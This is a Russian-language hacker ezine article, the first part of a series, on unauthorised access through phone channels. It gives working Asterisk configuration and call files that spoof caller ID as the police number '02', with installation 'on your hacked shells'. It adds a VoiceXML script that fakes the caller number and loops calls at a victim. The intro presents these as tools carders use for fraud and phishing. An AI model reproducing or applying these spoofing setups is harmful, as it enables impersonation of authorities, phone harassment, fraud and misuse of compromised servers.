[ Телефонный хакинг: НСД в каналах связи ]

							[ Часть 1 ]

		>>	[ Вступление ]

		Использование цифровых технологий связи все прочнее укрепляется в нашей повседневной жизни. 
	Даже моя бабушка знает, что такое Skype, и с чем его едят. Для хакера, прежде всего, это способ 
	моментальной коммуникации без четко фиксированного номера адресации, ну и кое-что еще. Уже Кевин Митник 
	в свое время промышлял телефонными шалостями и наклонял самых знаменитых миру операторов. В этой статье ты 
	прочитаешь о методах несанкционированного доступа через каналы связи и шуточках, организуемых с помощью 
	технологии Voice Over IP и недокументированных способностей, применяемых хакерами и кардерами всего мира 
	для фрода и фишинга.

		>>	[ С чем едят Caller ID? ]

		Caller ID (CID) представляет собой тип определителя номера звонящего. Если, будучи подключенным к 
	стареньким АТС, ты мог воспользоваться АОН'ом, который для пробива номера при входящем звонке использует 
	реверс-звонок на абонентскую станцию, поднимая трубку за тебя, что выражается в дублированном beep’е, то 
	современные цифровые (транзитные) станции в новых районах уже оснащены необходимым оборудованием под CID-услугу. 
	Она позволяет вызываемому абоненту видеть номер звонящего без проверки на АТС или альтернативной станции 
	специальной прозвонкой, чем и обеспечивает лазейку для шалостей. Для начала нашей задачей будет подмена номера 
	входящего звонка и шутка над своими знакомыми под Новый год с передачей привета с Марса от номера «02».

		>>	[ Операция начинается ]

		Для начала обзаведемся собственным аккаунтом для совершения интернациональных звонков. Весьма радостно, 
	что сейчас существует множество бесплатных цифровых операторов, поддерживающих протокол IAX, фигурирующий в 
	Asterisk VOIP PBX. IAX является основным конкурентом других стандартов передачи данных в VoIP-сетях, а 
	именно SIP, H.323. Безусловно, требуется выбрать такой оператор, который бы подходил тебе для совершения 
	твоих фрикерских подвигов с учетом геолокации и доступности звонков в ту или иную зону. Вполне удовлетворяют 
	названным требованиям Nufone и VoicePulse. Начнем с создания аккаунта на одном из сервисов. В процессе 
	регистрации тебе потребуется выбрать IAX в качестве типа сигнала и тарифный план «Pay as you go». Подтверди 
	пришедшее письмо и приступай к установке Asterix на одном из твоих взломанных шеллов.

		Собираем сервер VoIP-связи Asterix тривиальными линеевыми командами:

cd /usr/src/asterisk && make install && make samples

		Логинимся как root и редактируем /etc/asterisk/extensions.conf, добавляя следующие строки в конец 
	конфига. В поле «ДАННЫЕ от VoIP-провайдера» пишем свои собственные, примерно такого содержания: 
	username:[email protected].

[spoofing]
exten => _XXXXXXXXXX,1,dial,IAX2/ДАННЫЕ от VoIP-провайдера/1${EXTEN}
exten => _XXXXXXXXXX, 2, congestion() ; Нет ответа
exten => _XXXXXXXXXX, 102, busy() ; Занято

		Здорово, все основное сделано, теперь шаманим над файлом звонков. Создаем /tmp/spoof.call со 
	следующим содержанием: твой номер; номер, по которому ты звонишь; измененный номер CID.

Channel: IAX2/username:[email protected]/1мойномер (именно через 1)
Callerid: 02 (звонок от блюстителей правопорядка)
MaxRetries: 5
RetryTime: 60
WaitTime: 30
Context: spoofing
Extension: кому звоним
Priority: 1

		Обрати внимание на правильность ввода номера того, кому мы звоним: dial 011 + код страны + номер. 
	Запускаем Asterix. Логинимся в систему под рутом, выбираем один из способов запуска:

1. /usr/sbin/asterisk
2. /usr/sbin/asterisk -c (запуск в CLI mode)

		Чтобы проинициализировать звонок, набираем команду:

cp /tmp/spoof.call /var/spool/asterisk/outgoing

		При этом Asterisk запалит созданный файл звонков, и система запашет.

		Обрати внимание, что в редактируемую область ты можешь импортировать любые вариации, также пригодные 
	для спуфинга. Стоит отметить, что у различных провайдеров часть настроек не прокатывает. Все возможные 
	настройки Asterix ты можешь найти на диске, прилагаемом к журналу.

		>>	[ VoіceXML ]

		VXML - это язык программирования, основанный на XML-грамматике, которая позволяет создавать специальные 
	приложения, манипулирующие информацией, доступной пользователям, посредством голоса и телефона. В развитии 
	VXML принимают участие крупнейшие мировые компании, такие как AT&T, IBM, Lucent и Motorola. Суть использования 
	этой технологии конкретно в нашем замысле проста. Сперва найдем использующий ее сервис, а затем напишем 
	нехитрый скриптец, подменивающий CID. Примером для этого будет cafe.bevocal.com.

<?xml version="1.0"?>
<!DOCTYPE vxml PUBLIC "-//BeVocal Inc//VoiceXML 2.0//EN"
"http://cafe.bevocal.com/libraries/dtd/vxml2-0-bevocal.dtd">
<vxml version="2.0" xmlns="http://www.w3.org/2001/vxml">
<var name="myCall"/>
<form id="form2">
<block>
<bevocal:dial name="myCall" dest="tel:+КОМУ ЗВОНИМ' ani="ЛЮБОЙ НОМЕР"/>
<bevocal:disconnect call="myCall"/>
<goto next="#form2"/>
</block>
<catch event="connection.far_end.disconnect.timeout">
Запрос превысил максимальное позволенное время.
<exit/>
</catch>
<catch event="connection.disconnect.hangup">
<bevocal:disconnect call="myCall"/>
</catch>
</form>
</vxml>

		Заметь, что скрипт определяет цикл, то есть звонки будут сыпаться на абонента, пока сценарий не 
	прекратит выполняться.

 >>>>>>	ПРОДОЛЖЕНИЕ В СЛЕДУЮЩЕМ ВЫПУСКЕ ЕЗИНА...